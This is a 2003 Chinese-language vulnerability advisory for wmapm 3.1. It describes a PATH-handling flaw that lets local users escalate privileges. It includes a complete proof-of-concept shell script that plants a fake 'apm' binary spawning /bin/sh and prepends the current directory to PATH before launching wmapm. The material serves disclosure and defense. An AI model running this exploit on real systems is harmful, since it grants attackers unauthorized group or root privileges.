发布日期：2003-11-08
更新日期：2003-11-17

受影响系统：

Mike Henderson wmapm 3.1

描述：

---

BUGTRAQ  ID: 8995

wmapm是一款用于笔记本电脑的电池监视程序。

wmapm没有正确处理路径设置，本地攻击者可以利用这个漏洞提升权限。

本地攻击者可以设置本地路径设置，使wmapm应用程序错误的调用攻击者指定的木马或恶意程序。

<*来源：Knud Erik H?jgaard （knud@cybercity.dk）
  
  链接：http://www.security-corporation.com/exploits-20031110-002.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Knud Erik H?jgaard （knud@cybercity.dk）提供了如下测试方法：

#/bin/sh
# Pretty useless, we can mess up /etc/dumpdates or run shutdown
# on FreeBSD systems with wmapm from ports.
# If wmapm is installed from source we get root instead,
# so I suppose this might be worth something(uid 0) on linux.
# kokanin@dtors~ pkg_info | grep -i wmapm
# wmapm-3.1 Laptop battery status display for WindowMaker
# kokanin@dtors~ ls -la `which wmapm`
# -rwxr-sr-x 1 root operator 41892 Mar 23 10:00 /usr/X11R6/bin/wmapm
# kokanin@dtors~ sh DSR-wmapm.sh
# press the S button when wmapm starts
# $ /usr/bin/id
# uid=1001(kokanin) gid=1001(kokanin) egid=5(operator) groups=5(operator), 1001(kokanin), 0(wheel), 666(lewsers)
echo "/bin/sh" > apm
chmod +x ./apm
echo "press the S button(not the key, the BUTTON, in the PROGRAM) when wmapm starts"
export PATH=.:$PATH
/usr/X11R6/bin/wmapm
rm ./apm

建议：

---

厂商补丁：

Mike Henderson
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://nis-www.lanl.gov/~mgh/WindowMaker/DockApps.shtml

浏览次数：2657
严重程度：0（网友投票）